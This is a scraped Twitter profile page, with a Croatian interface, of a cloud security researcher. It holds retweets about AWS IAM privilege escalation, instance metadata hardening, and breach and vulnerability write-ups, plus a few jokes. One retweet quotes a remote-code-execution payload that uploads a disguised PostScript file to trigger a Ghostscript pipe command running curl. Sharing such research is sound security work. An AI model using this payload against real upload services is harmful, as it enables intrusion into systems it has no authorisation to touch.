Spencer Gietzen

@SpenGietz

Wrote Pacu, cloud security researcher, Lead Cloud Pentester at Rhino Security Labs

Seattle, WA
Vrijeme pridruživanja: travanj 2017.
19 fotografija ili videozapisa Fotografije i videozapisi

Tweetovi

Blokirali ste korisnika/cu @SpenGietz

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @SpenGietz

  1. Prikvačeni tweet
    23. lis 2019.

    Got AWS keys in a pentest or through a bug bounty program? Check out these 28 AWS IAM privilege escalation methods I put together on GitHub

    373 proslijeđena tweeta 916 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  2. proslijedio/la je Tweet
    27. stu 2019.

    “Don’t roll your own IAM” is the modern day “Don’t roll your own crypto”

    8 proslijeđenih tweetova 43 korisnika označavaju da im se sviđa
    Poništi
  3. proslijedio/la je Tweet
    25. stu 2019.

    I've been heads-down on final re:Invent blogging, and need to catch up on all of the posts from the last couple of days. Unroll this thread to see them all..

    9 replies 49 proslijeđenih tweetova 140 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    22. stu 2019.

    Policy Sentry v0.5.5 released. Includes more AWS services and allows the user to query the IAM Permissions database directly from the CLI. If you've ever wasted time searching through the IAM docs with Ctrl+F, this new feature might be for you.

    3 proslijeđena tweeta 21 korisnik označava da mu se sviđa
    Poništi
  5. proslijedio/la je Tweet
    20. stu 2019.

    "who the HELL is in my Google Doc" I think furiously, before realizing it's me in a different tab

    150 replies 27.875 proslijeđenih tweetova 191.974 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    19. stu 2019.

    I’ve been laughing for 10 mins straight😭

    712.290 proslijeđenih tweetova 1.925.742 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    19. stu 2019.

    Dang.. Our group chat is so boring you would rather talk ANYONE else...

    1:00
    Text me. 262.404.3664
    226 replies 1.265 proslijeđenih tweetova 27.083 korisnika označavaju da im se sviđa
    Poništi
  8. proslijedio/la je Tweet
    20. stu 2019.

    While I slept, released 88 new APIs. List overtook Get as #1 verb Most interesting: cloudtrail:GetInsightSelectors Runner up: ec2:EnableFastSnapshotRestores Longest: codecommit:BatchDisassociateApprovalRuleTemplateFromRepositories Busiest: quicksight (49 new!)

    14 proslijeđenih tweetova 69 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    20. stu 2019.

    Such awesomeness on so many levels... ✅ Technical walkthrough of vulnerabilities/compromise ✅ Configuration recommendation(s) for proper monitoring & investigations ✅ Tooling to ingest and search through logs ✅ Threat Hunting query examples

    Wait is over .. Read final part 2 which is focused on aws log data ingestion , and investigation of Capital one breach TTPs in
    Prikaži ovu nit
    5 proslijeđenih tweetova 14 korisnika označava da im se sviđa
    Poništi
  10. proslijedio/la je Tweet
    20. stu 2019.

    Wait is over .. Read final part 2 which is focused on aws log data ingestion , and investigation of Capital one breach TTPs in

    63 proslijeđena tweeta 172 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  11. proslijedio/la je Tweet
    20. stu 2019.

    AWS joins GCP and Azure in protecting the instance metadata service, including additional session-based features that other cloud providers don't have

    8 proslijeđenih tweetova 26 korisnika označava da im se sviđa
    Poništi
  12. proslijedio/la je Tweet
    20. stu 2019.

    Cracking reCAPTCHA, Turbo Intruder style - by

    1 reply 230 proslijeđenih tweetova 514 korisnika označava da im se sviđa
    Poništi
  13. proslijedio/la je Tweet
    19. stu 2019.

    From the blog: Add defense in depth against open firewalls, reverse proxies, and SSRF vulnerabilities with enhancements to the EC2 Instance Metadata Service

    7 replies 167 proslijeđenih tweetova 366 korisnika označava da im se sviđa
    Poništi
  14. proslijedio/la je Tweet
    18. stu 2019.

    Check out part one of 's two-part series on the Capital One Breach! In this post, he walks through how to set up and complete the CloudGoat cloud_breach_s3 scenario.

    19 proslijeđenih tweetova 37 korisnika označava da im se sviđa
    Poništi
  15. proslijedio/la je Tweet
    13. stu 2019.

    In an effort to compete with Google's ongoing war on their own customers, has quietly rolled out a potentially breaking change to their Application Load Balancers. A thread.

    59 proslijeđenih tweetova 146 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    7. stu 2019.

    RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl ) ) .putdeviceparams quit

    304 proslijeđena tweeta 742 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    7. stu 2019.

    Some interesting new APIs for Single Sign On

    1 reply 2 proslijeđena tweeta 6 korisnika označava da im se sviđa
    Poništi
  18. proslijedio/la je Tweet
    2. stu 2019.

    It looks like a worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner.

    huh, the EternalPot RDP honeypots have all started BSOD'ing recently. They only expose port 3389.
    Prikaži ovu nit
    492 proslijeđena tweeta 1.074 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    31. lis 2019.

    Did you know you can use the Connection header to delete other headers? Interesting research lead by :

    206 proslijeđenih tweetova 448 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  20. proslijedio/la je Tweet
    29. lis 2019.

    Wrote a post about some Vulnerabilities Leading to RCE in LabKey Server

    4 proslijeđena tweeta 4 korisnika označavaju da im se sviđa
    Poništi
  21. proslijedio/la je Tweet
    29. lis 2019.

    Check out our latest blog post, a walkthrough of the 3 different vulnerabilities discovered by in the LabKey Server--stored XSS, CSRF leading to RCE, and XXE allowing arbitrary file read:

    34 proslijeđena tweeta 83 korisnika označavaju da im se sviđa
    Poništi

@SpenGietz još nije objavio nijedan Tweet.

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·